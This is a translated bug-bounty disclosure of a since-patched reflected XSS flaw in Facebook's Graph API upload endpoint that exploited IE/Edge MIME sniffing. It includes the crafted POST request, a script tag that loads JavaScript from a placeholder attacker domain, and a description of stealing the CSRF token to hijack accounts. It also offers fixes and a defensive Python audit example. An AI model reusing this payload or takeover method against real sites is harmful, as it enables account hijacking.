
Using Reflected XSS Vulnerability to Hijack Facebook Accounts

王林
Release: 2019-12-28 17:59:36


Vulnerability Overview

This vulnerability is only exploitable in the IE and Edge browsers. Its cause is that some API endpoints on graph.facebook.com do not apply complete and safe escaping when HTML code is reflected in the response. The response is in JSON format, the HTML code is included as the value of one of its fields, and the response carries neither a Content-Type nor an X-Content-Type-Options header, which gives me the opportunity to have IE/Edge execute the constructed code.

(These two browsers scan the entire page to determine the MIME type, while other browsers only check the first few bytes.)

Vulnerability Reproduction

1. First, send a POST request to the upload endpoint as follows:

POST /app/uploads
Host: graph.facebook.com

access_token=ACCESS_TOKEN&file_length=100&file_type=PAYLOAD

ACCESS_TOKEN is a valid user access token generated by the first-party Facebook for Android application, and PAYLOAD is the HTML code we want to insert so that the victim's browser later executes it. When the request is submitted, the server returns a value similar to the following, containing a session ID that will be used later (refer to Facebook's official documentation for details):

{"id": "upload:MTphdHRhY2htZW50Ojlk2mJiZxUwLWV6MDUtNDIwMy05yTA3LWQ4ZDPmZGFkNTM0NT8=?sig=ARZqkGCA_uQMxC8nHKI"}

Testing showed that the response carries no Content Security Policy (CSP) restrictions, so I considered whether I could insert HTML code that loads an external JavaScript file, for example:

<html><body><script src=//DOMAIN.com/script.js ></script></body></html>

2. The Facebook backend Base64-encodes the upload request, and the returned value, shown below, contains the payload we inserted:

upload:MTphdHRhY2htZW50OjZiZnNjNmYxLTljY2MtNDQxNi05YzM1LTFlc2YyMmI5OGlmYz9maWxlX2xlbmd0aD0wJmZpbGVfdHlwZT08aHRtbD48
Y**keT48c2NyaXB0IHNyYz0vL0RPTUFJTi5jb20vc2NyaXB0LmpzID48L3NjcmlwdD48L2JvZHk+PC9odG1sPg==?sig=ARaCDqLfwoeI8V3s

Using this encoded string, the following URL can be used as the target of a POST request to Facebook:

https://graph.facebook.com/upload:MTphdHRhY2htZW50OjZiZnNjNmYxLTljY2MtNDQxNi05YzM1LTFlc2YyMmI5OGlmYz9maWxlX2xlbmd0aD 
0wJmZpbGVfdHlwZT08aHRtbD48Y**keT48c2NyaXB0IHNyYz0vL0RPTUFJTi5jb20vc2NyaXB0LmpzID48L3NjcmlwdD48L2JvZHk+PC9odG1sPg==?s
ig=ARaCDqLfwoeI8V3s

3. Using the above request string together with the valid access_token generated in step 1, I constructed an HTML web page and hosted it on my website:

[Figure: screenshot of the constructed HTML page]

This page contains a form submission, and the response message returned after the victim visits it is as follows:

{"h":"2::<html><body><script src=//DOMAIN.com/script.js ></script></body></html>:GVo0nVVSEBm2kCDZXKFCdFSlCSZjbugb
AAAP:e:1571103112:REDACATED:REDACATED:ARCvdJWLVDpBjUAZzrg"}

Importantly, the script file at https://DOMAIN.com/script.js steals the victim's "fb_dtsg" CSRF token and sends a request to https://www.facebook.com/api/graphql/ that binds a phone number or email address to the account, achieving indirect hijacking of the victim's account.

Vulnerability Fix

1. Add safe escaping of HTML code in the file_type parameter;
2. Add a "Content-type: application/json" header to every response to prevent further attacks.
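To make the two fixes concrete, and to show why the MIME-sniffing behaviour described in the overview matters, the following is an added example (my own code, not Facebook's) that builds a JSON response in the weak shape the article describes beside a hardened one, and audits either for the conditions a defender would flag. The record layout and the "upload:EXAMPLE-SESSION-ID" value are constructed placeholders, not the real API's format.

```python
import html
import json
import re
from typing import Dict, List, Tuple

# Constructed sample record (assumption: the reflected field is the
# attacker-controlled file_type value, as on the page). The id is a placeholder.
SAMPLE_RECORD = {
    "id": "upload:EXAMPLE-SESSION-ID",
    "file_type": "<html><body><script src=//DOMAIN.com/script.js ></script></body></html>",
}


def weak_response(record: Dict[str, str]) -> Tuple[Dict[str, str], str]:
    """The pre-fix shape: HTML reflected verbatim inside the JSON body and no
    Content-Type / X-Content-Type-Options header. A sniffing browser that scans
    the whole body for markup can decide this is HTML and run the script."""
    return {}, json.dumps(record)


def hardened_response(record: Dict[str, str]) -> Tuple[Dict[str, str], str]:
    """Fix 1: HTML-escape every reflected string value, so '<' becomes '&lt;'
    and the body no longer contains a tag for a sniffer to find.
    Fix 2: declare the type explicitly and forbid sniffing."""
    safe = {k: html.escape(v) if isinstance(v, str) else v for k, v in record.items()}
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    return headers, json.dumps(safe)


def _header(headers: Dict[str, str], name: str) -> str:
    """Case-insensitive header lookup (HTTP header names are case-insensitive)."""
    for k, v in headers.items():
        if k.lower() == name.lower():
            return v
    return ""


_TAG = re.compile(r"<\s*(script|html|body|img|svg|iframe)\b", re.IGNORECASE)


def audit_response(headers: Dict[str, str], body: str) -> List[str]:
    """Return the findings a reviewer would raise on a JSON API response."""
    findings = []
    if not _header(headers, "Content-Type").lower().startswith("application/json"):
        findings.append("missing or non-JSON Content-Type")
    if _header(headers, "X-Content-Type-Options").lower() != "nosniff":
        findings.append("missing X-Content-Type-Options: nosniff")
    if _TAG.search(body):
        findings.append("body contains an unescaped HTML tag")
    return findings


if __name__ == "__main__":
    for label, fn in (("weak", weak_response), ("hardened", hardened_response)):
        h, b = fn(SAMPLE_RECORD)
        print(label, audit_response(h, b) or "no findings")
```

Running the module prints three findings for the weak response and none for the hardened one; the audit function can be pointed at captured headers and bodies from a proxy log to look for the same pattern in other JSON endpoints.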
Vulnerability Report and Handling Timeline

2019.10.10   Initial report
2019.10.10   Facebook confirmed
2019.10.11   Facebook fixed
2019.10.24   Facebook awarded a $5000 bounty
Source: freebuf.com